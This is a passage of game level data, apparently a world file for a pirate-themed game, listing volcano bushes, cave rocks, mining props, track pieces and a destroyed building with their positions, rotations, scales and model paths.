'models/props/pir_m_prp_vol_flower_white_b'}},'1273620598.95akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(426.241, -94.92, 13.703),'Scale': VBase3(2.283, 2.283, 2.283),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620603.47akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': 
Point3(0.0, 0.0, 0.0),'Pos': Point3(388.249, -75.752, 13.632),'Scale': VBase3(2.167, 2.167, 2.167),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620611.52akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(255.429, -125.341, 36.099),'Scale': VBase3(2.261, 2.261, 2.261),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620618.66akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(126.296, -185.197, 56.934),'Scale': VBase3(1.86, 1.86, 1.86),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620621.63akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(136.57, -201.217, 59.127),'Scale': VBase3(1.983, 1.983, 1.983),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620626.34akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(88.849, -119.957, 63.239),'Scale': VBase3(2.281, 2.281, 2.281),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620630.56akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(129.539, 0.0, 0.0),'Pos': Point3(19.8, -157.402, 90.844),'Scale': VBase3(2.456, 2.456, 2.456),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620634.73akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(5.605, -74.699, 91.008),'Scale': VBase3(2.714, 2.714, 2.714),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620640.63akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-114.667, -114.099, 103.218),'Scale': VBase3(1.898, 1.898, 1.898),'VisSize': '','Visual': {'Model': 
'models/props/pir_m_prp_vol_bush_a'}},'1273620656.94akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-80.795, -197.734, 109.73),'Scale': VBase3(1.824, 1.824, 1.824),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620659.98akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-105.078, -214.022, 108.741),'Scale': VBase3(1.705, 1.705, 1.705),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620665.97akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(55.778, 0.0, 0.0),'Pos': Point3(-166.925, -256.805, 109.542),'Scale': VBase3(1.769, 1.769, 1.769),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620669.09akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-223.13, -278.25, 113.054),'Scale': VBase3(1.692, 1.692, 1.692),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620672.67akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-203.132, -177.845, 108.555),'Scale': VBase3(1.745, 1.745, 1.745),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620677.44akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(20.783, 0.0, 0.0),'Pos': Point3(-268.584, -268.242, 117.387),'Scale': VBase3(2.219, 2.219, 2.219),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620682.63akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-306.456, -278.017, 120.313),'Scale': VBase3(2.986, 2.986, 2.986),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620688.64akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': 
Point3(-365.517, -325.527, 120.002),'Scale': VBase3(1.924, 1.924, 1.924),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620692.56akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-308.387, -330.941, 127.619),'Scale': VBase3(2.14, 2.14, 2.14),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620702.75akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-313.208, -198.079, 111.069),'Scale': VBase3(2.088, 2.088, 2.088),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620705.88akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-322.224, -171.344, 108.144),'Scale': VBase3(2.361, 2.361, 2.361),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620709.64akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-298.874, -142.428, 107.642),'Scale': VBase3(1.616, 1.616, 1.616),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620713.89akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-204.136, -132.062, 106.618),'Scale': VBase3(1.48, 1.48, 1.48),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620720.83akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-187.277, -96.786, 106.586),'Scale': VBase3(2.721, 2.721, 2.721),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620724.8akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-159.974, -26.898, 105.409),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620734.59akelts': 
{'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-259.111, 58.306, 64.865),'Scale': VBase3(1.671, 1.671, 1.671),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620743.03akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-262.617, 161.265, 65.686),'Scale': VBase3(1.461, 1.461, 1.461),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620751.28akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-352.014, 49.097, 66.609),'Scale': VBase3(2.187, 2.187, 2.187),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620758.86akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-444.333, 19.088, 72.807),'Scale': VBase3(1.971, 1.971, 1.971),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620762.03akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-406.664, 13.092, 72.164),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620766.06akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(52.414, 0.0, 0.0),'Pos': Point3(-420.963, 65.071, 71.83),'Scale': VBase3(1.86, 1.86, 1.86),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620772.64akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-450.048, 6.82, 72.822),'Scale': VBase3(1.161, 1.161, 1.161),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620775.31akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-477.285, 30.66, 73.914),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': 
{'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620777.73akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-451.714, -6.598, 72.899),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620787.44akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-433.415, 91.785, 70.082),'Scale': VBase3(1.317, 1.317, 1.317),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620791.5akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-487.187, 95.366, 72.252),'Scale': VBase3(1.658, 1.658, 1.658),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620797.59akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-576.54, 95.093, 72.566),'Scale': VBase3(2.157, 2.157, 2.157),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620801.52akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(67.427, 0.0, 0.0),'Pos': Point3(-659.008, 67.234, 66.11),'Scale': VBase3(3.578, 3.578, 3.578),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620805.95akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(157.661, 0.0, 0.0),'Pos': Point3(-681.14, 167.573, 57.095),'Scale': VBase3(2.445, 2.445, 2.445),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620829.78akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-611.407, 300.71, 63.11),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620834.02akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-489.717, 
346.313, 53.453),'Scale': VBase3(2.387, 2.387, 2.387),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620838.81akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(94.218, 0.0, 0.0),'Pos': Point3(-516.884, 441.594, 39.257),'Scale': VBase3(2.409, 2.409, 2.409),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620841.69akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-500.995, 448.93, 39.705),'Scale': VBase3(1.716, 1.716, 1.716),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620847.56akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-436.523, 351.488, 49.855),'Scale': VBase3(1.66, 1.66, 1.66),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620849.91akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-383.726, 386.226, 44.652),'Scale': VBase3(2.204, 2.204, 2.204),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620856.56akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-310.283, 446.307, 42.41),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620875.95akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-312.948, 390.778, 46.787),'Scale': VBase3(2.139, 2.139, 2.139),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620880.69akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-269.085, 402.314, 47.326),'Scale': VBase3(1.702, 1.702, 1.702),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620883.53akelts': {'Type': 
'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-279.393, 379.762, 50.41),'Scale': VBase3(1.523, 1.523, 1.523),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620888.42akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-242.528, 463.478, 45.622),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620896.14akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-228.665, 483.403, 47.665),'Scale': VBase3(1.665, 1.665, 1.665),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620901.55akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-293.988, 603.245, 22.945),'Scale': VBase3(2.502, 2.502, 2.502),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620906.09akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-295.999, 646.253, 17.802),'Scale': VBase3(2.098, 2.098, 2.098),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620910.08akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-238.345, 690.586, 11.139),'Scale': VBase3(2.861, 2.861, 2.861),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620916.48akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-190.924, 712.447, 1.722),'Scale': VBase3(1.207, 1.207, 1.207),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620923.53akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-122.813, 603.535, 22.122),'Scale': VBase3(1.84, 1.84, 1.84),'VisSize': '','Visual': 
{'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273620981.88akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(101.749, 603.353, 16.722),'Scale': VBase3(3.429, 3.429, 3.429),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273620989.84akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-87.065, 547.859, 27.13),'Scale': VBase3(2.225, 2.225, 2.225),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273621006.77akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(172.103, 603.323, 17.631),'Scale': VBase3(1.698, 1.698, 1.698),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273621011.42akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(-76.99, 0.0, 0.0),'Pos': Point3(223.179, 587.15, 25.194),'Scale': VBase3(2.424, 2.424, 2.424),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273621016.53akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(16.261, 0.0, 0.0),'Pos': Point3(235.774, 595.157, 25.159),'Scale': VBase3(2.155, 2.155, 2.155),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_b'}},'1273621023.86akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(-24.529, 0.0, 0.0),'Pos': Point3(288.969, 646.145, 22.442),'Scale': VBase3(2.37, 2.37, 2.37),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273621031.13akelts': {'Type': 'Volcano','DisableCollision': False,'Holiday': '','Hpr': VBase3(-154.841, 0.0, 0.0),'Pos': Point3(302.898, 681.027, 18.051),'Scale': VBase3(1.812, 1.812, 1.812),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}},'1273622024.05akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273622024.05akelts0','Holiday': '','Hpr': 
VBase3(-156.462, 1.616, -0.945),'Objects': {'1273684027.48akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(266.934, 628.765, 24.002),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.162, -4.354, 0.599),'Scale': VBase3(1.0, 1.0, 1.0),'TargetUIDs': []}},'Pos': Point3(269.848, 625.636, 23.974),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseG_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273622193.64akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(-156.729, 0.0, -2.774),'Objects': {},'Pos': Point3(163.692, -197.923, 57.709),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}},'1273622246.2akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-120.926, 13.894, -4.981),'Pos': Point3(155.24, -202.555, 52.323),'RenderEffect': False,'Scale': VBase3(1.095, 1.095, 1.332),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1273622309.08akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(69.736, 0.0, 0.0),'Pos': Point3(168.909, -190.166, 53.535),'RenderEffect': False,'Scale': VBase3(0.899, 0.899, 0.899),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1273622343.75akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-118.636, 40.255, -131.12),'Pos': Point3(138.386, -211.711, 103.597),'RenderEffect': False,'Scale': VBase3(1.064, 1.064, 1.064),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1273622401.11akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(119.339, 0.0, 0.0),'Pos': 
Point3(170.54, -195.743, 55.088),'RenderEffect': False,'Scale': VBase3(0.548, 0.548, 0.548),'VisSize': '','Visual': {'Color': (0.30000001192092896, 0.30000001192092896, 0.30000001192092896, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_e'}},'1273678010.59akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(42.156, 1.873, 7.811),'Pos': Point3(142.544, -177.865, 53.948),'RenderEffect': False,'Scale': VBase3(3.236, 3.236, 3.937),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273678061.25akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-100.476, -7.384, -6.552),'Pos': Point3(176.789, -175.976, 50.648),'RenderEffect': False,'Scale': VBase3(3.236, 3.236, 3.937),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273684589.5akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-169.018, 0.0, 0.0),'Pos': Point3(-388.282, 98.411, 64.884),'RenderEffect': False,'Scale': VBase3(0.511, 0.511, 0.511),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273684622.66akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(142.911, 5.813, 0.0),'Pos': Point3(-474.118, 449.934, 39.992),'RenderEffect': False,'Scale': VBase3(2.5, 2.5, 2.5),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_f'}},'1273684653.06akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-3.679, -0.902, 0.851),'Pos': Point3(-430.645, 111.888, 67.638),'RenderEffect': False,'Scale': VBase3(3.183, 3.183, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273684715.98akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': 
VBase3(-135.237, 6.411, -1.008),'Pos': Point3(-660.959, 118.033, 60.851),'RenderEffect': False,'Scale': VBase3(3.382, 3.382, 3.382),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273684786.02akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-108.287, -0.218, -3.118),'Pos': Point3(-272.423, -108.126, 106.332),'RenderEffect': False,'Scale': VBase3(3.921, 3.921, 4.528),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273686000.47akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-180.0, -82.688, 180.0),'Pos': Point3(225.542, 593.944, 26.324),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_cartEmpty'}},'1273686056.8akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-104.037, 81.994, -19.397),'Pos': Point3(221.448, 596.21, 24.218),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/pir_m_prp_mng_shovel'}},'1273686095.08akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(221.485, 594.507, 24.589),'Scale': VBase3(0.83, 0.83, 0.83),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_rusty_bucket'}},'1273686115.81akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(31.601, 87.74, -31.551),'Pos': Point3(231.613, 584.746, 24.809),'Scale': VBase3(1.529, 1.529, 1.529),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_wheel'}},'1273686182.59akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-117.938, 5.804, -0.914),'Objects': {'1273685989.81akelts': {'Type': 'Mining_props','DisableCollision': 
False,'GridPos': Point3(213.256, 596.251, 24.747),'Holiday': '','Hpr': VBase3(89.635, -0.042, 0.068),'Pos': Point3(-0.024, -2.586, 0.302),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_mng_cart'}},'1273686376.13akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(210.947, 594.813, 24.755),'Holiday': '','Hpr': VBase3(90.626, 0.073, -2.764),'Pos': Point3(2.317, -3.967, 0.411),'Scale': VBase3(0.14, 0.14, 0.14),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_mng_supportBeam_single'}},'1273706136.45akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(111.692, 632.573, 16.426),'Holiday': '','Hpr': VBase3(-159.017, 2.145, -0.868),'Objects': {'1273706558.84akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(112.101, 633.574, 16.512),'Holiday': '','Hpr': VBase3(177.68, 0.7, 0.348),'Objects': {'1273706558.94akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(1.469, 637.047, 13.08),'Holiday': '','Hpr': VBase3(-159.007, 2.803, -0.868),'Objects': {'1273706569.48akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(1.517, 637.094, 13.187),'Holiday': '','Hpr': VBase3(177.17, -2.944, -0.343),'Objects': {'1273706569.45akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(-41.35, 630.56, 15.261),'Holiday': '','Hpr': VBase3(0.0, -1.047, 0.0),'Objects': {'1273706569.66akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(-147.433, 596.475, 24.713),'Holiday': '','Hpr': VBase3(-159.039, 0.659, -0.867),'Objects': {},'Pos': Point3(14.5, -109.814, 0.83),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_curve'}}},'Pos': Point3(0.0, -43.412, 0.002),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 
1.0),'Model': 'models/props/pir_m_prp_mng_track_straight'}}},'Pos': Point3(0.033, -0.057, 0.109),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_straight'}}},'Pos': Point3(14.509, -109.735, 3.31),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_curve'}}},'Pos': Point3(0.033, -0.052, 0.115),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_straight'}}},'Pos': Point3(14.509, -109.765, 2.571),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_curve'}}},'Pos': Point3(215.554, 595.027, 24.708),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.541, 0.609, 0.712, 1.0),'Model': 'models/props/pir_m_prp_mng_track_straight'}},'1273686245.88akelts': {'Type': 'Cave_Props','DisableCollision': True,'GridPos': Point3(190.428, 597.402, 14.708),'Holiday': '','Hpr': VBase3(96.594, 1.188, 9.44),'Pos': Point3(190.171, 593.354, 15.198),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.316),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_g'}},'1273686464.41akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-27.091, 